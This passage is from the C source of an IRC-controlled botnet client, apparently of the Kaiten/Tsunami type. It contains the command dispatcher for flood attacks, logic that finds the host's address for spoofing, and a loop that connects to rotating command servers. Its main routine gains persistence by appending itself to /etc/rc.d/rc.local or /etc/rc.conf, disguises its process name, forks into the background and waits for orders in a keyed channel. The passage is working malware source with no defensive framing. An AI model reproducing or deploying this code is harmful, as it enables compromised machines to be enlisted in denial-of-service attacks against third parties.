843. flooders[m].func(sock,sender,num_params-1,params);
844. for (i=1;i<num_params;i++) free(params[i]);
845. return;
846. }
847. }
848. }
849. }
850. void _376(int sock, char *sender, char *str) {
851. Send(sock,"MODE %s +pixB\n",nick);
852. Send(sock,"JOIN %s :%s\n",chan,key);
853. Send(sock,"WHO %s\n",nick);
854. }
855. void _PING(int sock, char *sender, char *str) {
856.  
857. Send(sock,"PONG %s\n",str);
858.  
859. }
860.  
861. void _352(int sock, char *sender, char *str) {
862. int i,d;
863. char *msg=str;
864. struct hostent *hostm;
865. unsigned long m;
866. for (i=0,d=0;d<5;d++) {
867. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
868. if (i == strlen(str)) return;
869. }
870. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
871. msg[i]=0;
872. if (!strcasecmp(msg,nick) && !spoofsm) {
873. msg=str;
874. for (i=0,d=0;d<3;d++) {
875. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
876. if (i == strlen(str)) return;
877. }
878. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
879. msg[i]=0;
880. if ((m = inet_addr(msg)) == -1) {
881. if ((hostm=gethostbyname(msg)) == NULL) {
882. //Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
883. return;
884. }
885. memcpy((char*)&m, hostm->h_addr, hostm->h_length);
886. }
887. ((char*)&spoofs)[3]=((char*)&m)[0];
888. ((char*)&spoofs)[2]=((char*)&m)[1];
889. ((char*)&spoofs)[1]=((char*)&m)[2];
890. ((char*)&spoofs)[0]=0;
891. spoofsm=256;
892. }
893. }
894. void _433(int sock, char *sender, char *str) {
895. free(nick);
896. char tempnick[50];
897. char *strpref = PREFIX;
898. char *genname = makestring();
899. strcpy(tempnick,strpref);
900. strcat(tempnick,genname);
901. nick=tempnick;
902. }
903.  
904. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
905. { "352", _352 },
906. { "376", _376 },
907. { "433", _433 },
908. { "422", _376 },
909. { "PRIVMSG", _PRIVMSG },
910. { "PING", _PING },
911. { (char *)0, (void (*)(int,char *,char *))0 } };
912. void con() {
913. struct sockaddr_in srv;
914. unsigned long ipaddr,start;
915. int flag;
916. struct hostent *hp;
917. start:
918. sock=-1;
919. flag=1;
920. if (changeservers == 0) server=servers[rand()%numservers];
921. changeservers=0;
922. while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
923. if (inet_addr(server) == 0 || inet_addr(server) == -1) {
924. if ((hp = gethostbyname(server)) == NULL) {
925. server=NULL;
926. close(sock);
927. goto start;
928. }
929. bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
930. }
931. else srv.sin_addr.s_addr=inet_addr(server);
932. srv.sin_family = AF_INET;
933. srv.sin_port = htons(PORT);
934. ioctl(sock,FIONBIO,&flag);
935. start=time(NULL);
936. while(time(NULL)-start < 10) {
937. errno=0;
938. if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
939. setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
940. setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
941. setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
942. return;
943. }
944. if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
945. sleep(1);
946. }
947. server=NULL;
948. close(sock);
949. goto start;
950. }
951. int main(int argc, char *argv[]) {
952. int on,i;
953. char cwd[256],*str;
954. FILE *file;
955. #ifdef STARTUP
956. str="/etc/rc.d/rc.local";
957. file=fopen(str,"r");
958. if (file == NULL) {
959. str="/etc/rc.conf";
960. file=fopen(str,"r");
961. }
962. if (file != NULL) {
963. char outfile[256], buf[1024];
964. int i=strlen(argv[0]), d=0;
965. getcwd(cwd,256);
966. if (strcmp(cwd,"/")) {
967. while(argv[0][i] != '/') i--;
968. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
969. while(!feof(file)) {
970. fgets(buf,1024,file);
971. if (!strcasecmp(buf,outfile)) d++;
972. }
973. if (d == 0) {
974. FILE *out;
975. fclose(file);
976. out=fopen(str,"a");
977. if (out != NULL) {
978. fputs(outfile,out);
979. fclose(out);
980. }
981. }
982. else fclose(file);
983. }
984. else fclose(file);
985. }
986. #endif
987. if (fork()) exit(0);
988. #ifdef FAKENAME
989. strncpy(argv[0],FAKENAME,strlen(argv[0]));
990. for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
991. #endif
992. srand((time(NULL) ^ getpid()) + getppid());
993. char tempnick[50];
994. char *strpref = PREFIX;
995. char *genname = makestring();
996.  
997. strcpy(tempnick,strpref);
998. strcat(tempnick,genname);
999.  
1000. nick=tempnick;
1001. ident="Remote";
1002. user="Remote IRC Bot";
1003. chan=CHAN;
1004. key=KEY;
1005. pass=PASS;
1006. server=NULL;
1007. sa:
1008. #ifdef IDENT
1009. for (i=0;i<numpids;i++) {
1010. if (pids[i] != 0 && pids[i] != getpid()) {
1011. kill(pids[i],9);
1012. waitpid(pids[i],NULL,WNOHANG);
1013. }
1014. }
1015. pids=NULL;
1016. numpids=0;
1017. identd();
1018. #endif
1019.  
1020. con();
1021. Send(sock,"PASS %s\n", pass);
1022. Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
1023. while(1) {
1024. unsigned long i;
1025. fd_set n;
1026. struct timeval tv;
1027. FD_ZERO(&n);
1028. FD_SET(sock,&n);
1029. tv.tv_sec=60*20;
1030. tv.tv_usec=0;
1031. if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
1032. for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
1033. unsigned int *newpids,on;
1034. for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
1035. pids[on-1]=0;
1036. numpids--;
1037. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
1038. for (on=0;on<numpids;on++) newpids[on]=pids[on];
1039. free(pids);
1040. pids=newpids;
1041. }
1042. if (FD_ISSET(sock,&n)) {
1043. char buf[4096], *str;
1044. int i;
1045. if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
1046. buf[i]=0;
1047. str=strtok(buf,"\n");
1048. while(str && *str) {
1049. char name[1024], sender[1024];
1050. filter(str);
1051. if (*str == ':') {
1052. for (i=0;i<strlen(str) && str[i] != ' ';i++);
1053. str[i]=0;
1054. strcpy(sender,str+1);
1055. strcpy(str,str+i+1);
1056. }
1057. else strcpy(sender,"*");
1058. for (i=0;i<strlen(str) && str[i] != ' ';i++);
1059. str[i]=0;
1060. strcpy(name,str);
1061. strcpy(str,str+i+1);
1062. for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
1063. if (!strcasecmp(name,"ERROR")) goto sa;
1064. str=strtok((char*)NULL,"\n");
1065. }
1066. }
1067. }
1068. return 0;
1069. }